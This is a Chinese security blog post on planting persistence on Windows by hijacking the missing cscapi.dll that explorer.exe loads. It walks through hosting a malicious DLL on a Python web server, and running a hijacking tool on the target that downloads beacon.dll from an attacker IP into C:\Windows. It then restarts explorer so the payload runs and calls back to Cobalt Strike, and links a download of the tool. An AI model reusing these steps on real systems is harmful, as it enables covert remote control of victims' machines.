权限维持-利用Explorer.exe来驻留目标

admin 2024年11月11日13:27:32评论19 views字数 709阅读2分21秒阅读模式
 

前言

Windows 文件资源管理器是 Windows 操作系统和默认桌面环境的图形文件管理实用程序。Windows 资源管理器是在 Windows 95 中引入的,它与进程explorer.exe相关联。由于这是一个本机 Windows 进程,它可以用于注入任意代码。缺少 DLL 的进程容易受到DLL 劫持。缺少的 DLL 的识别很简单,只需要进程监视器过滤 explorer.exe 以查找包含NAME NOT FOUND的结果。explorer.exe 缺少的 DLL 之一是 cscapi.dll

权限维持-利用Explorer.exe来驻留目标

实操

我们需要一个web服务来给我们恶意的dll做载体,我们可以使用python如下:

python3 -m http.server 8080
权限维持-利用Explorer.exe来驻留目标

我们使用工具将Explorer.exe与提供任意 DLL 的主机进行通信,检索并将 DLL 写入C:Windows路径,如下:

目标主机执行

DLLHijacking.exe 192.168.41.140 8080 beacon.dll
权限维持-利用Explorer.exe来驻留目标

我们可以看下dll是否已经写入完成:

权限维持-利用Explorer.exe来驻留目标

只要目标主机进行重启,或者严格意义上说时explorer重启,我们的恶意dll都会被运行并且上线。

这里由于我的cs和受害机器为一台,重启太过于麻烦,所以我直接用命令重启explorer

taskkill /f /im explorer.exe && explorer.exe
权限维持-利用Explorer.exe来驻留目标

工具获取

通过百度网盘分享的文件:dll.zip

链接:https://pan.baidu.com/s/1XWKdqwHIMbz-I8pkrVjUbA?pwd=urbc 提取码:urbc

原文始发于微信公众号(SecretTeam安全团队):权限维持-利用Explorer.exe来驻留目标

 

免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2024年11月11日13:27:32
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   权限维持-利用Explorer.exe来驻留目标https://cn-sec.com/archives/3381407.html
                  免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉.

发表评论

匿名网友 填写信息